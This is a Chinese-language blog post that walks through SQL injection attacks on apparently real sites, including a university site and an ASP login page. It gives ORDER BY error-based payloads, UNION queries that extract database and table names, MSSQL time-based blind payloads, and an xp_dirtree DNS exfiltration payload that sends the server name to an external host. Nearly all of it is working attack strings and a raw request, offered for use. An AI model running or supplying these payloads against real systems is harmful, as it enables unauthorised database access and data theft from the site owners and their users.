SQL注入实战

1、orderBy报错注入

某大学

www.target.com?orderBy=1

注入为orderBy注入,将orderby更改为id测试时并不能造成报错回显故不能当注入点

正常状态下

经过测试可知共14列,orderBy=15时报错,由于列名可控?orderby=$id

这里使用XPath报错注入,Geohash报错等均不能正常使用

orderBy=1/updatexml(0x0a,if(1=2,1,concat(0x0a,database())),0x0a)--+

orderBy=1/updatexml(0x7e,concat(0x7e,(select database()),0x7e),0x7e)

orderBy=1/extractvalue(1,concat(0x7e,(select database())))

2、联合查询

经测试共有10列其中6,8为回显字段

www.target.com/.php?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10%20--+

.php?id=1 union select 1,2,3,4,5,database(),7,version(),9,10 --+

表名:.php?id=1 union select 1,2,3,4,5,concat(table_name),7,version(),9,10 from information_schema.tables where table_schema='techmarthk_data'--+

3、mssql延时注入

两个路径两个sql为同一手法

延时注入+dnslog外带

post型,注入点为username

POST /xxxxx/xxxxx/login.asp HTTP/2

Host:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Content-Type:

Content-Length: 121

Upgrade-Insecure-Requests: 1

username=admin&passwd=1&login=

单引号回显不正常构造payload

admin+and+1=1';WAITFOR+DELAY'0:0:3'--+

判断数据库长度经测试为3

admin and 1=1'if(len(db_name())=3)WAITFOR+DELAY'0:0:3'--+

注出数据库名(这里两条payload有点绕)

区别:第一条payload需要进行url编码即可执行延时,如若直接执行则不会延时

第二条payload不需要进行url编码即可执行延时,如若进行编码则不会延时

admin and 1=1'if(ascii(substring((db_name()),1,1))>1)WAITFOR DELAY'0:0:3'--+

admin and 1=1'if (ascii(substring((db_name()),1,1))>1) WAITFOR+DELAY'0:0:3'--+

dnslog外带

admin';DECLARE @payload varchar(8000);SET @payload=(SELECT @@SERVERNAME) '.3e3b54d658.ipv6.1433.eu.org.';EXEC('master..xp_dirtree"\\' @payload '\foobar$"');--

相关推荐
qq_463944861 分钟前
如何把Excel文件导入Navicat?
数据库·excel
不太厉害的程序员3 分钟前
Excel 将数据导入到SQLServer数据库
数据库·sqlserver·excel
技术卷1 小时前
详解力扣高频SQL50题之610. 判断三角形【简单】
sql·leetcode·oracle
betazhou2 小时前
MySQL ROUTER安装部署
android·数据库·mysql·adb·mgr·mysql router
中东大鹅2 小时前
Mybatis Plus 多数据源
java·数据库·spring boot·后端·mybatis
一枚小小程序员哈3 小时前
springboot基于Java与MySQL库的健身俱乐部管理系统设计与实现
数据库·spring boot·mysql·spring·java-ee·intellij-idea
Antonio9153 小时前
【Redis】 Redis 基础命令和原理
数据库·redis·缓存
非优秀程序员3 小时前
未来的编程将会是什么样子?从面向对象转为面向业务数据!!
数据库·架构
技术卷4 小时前
详解力扣高频SQL50题之619. 只出现一次的最大数字【简单】
sql·leetcode·oracle
老华带你飞4 小时前
口腔助手|口腔挂号预约小程序|基于微信小程序的口腔门诊预约系统的设计与实现(源码+数据库+文档)
java·数据库·微信小程序·小程序·论文·毕设·口腔小程序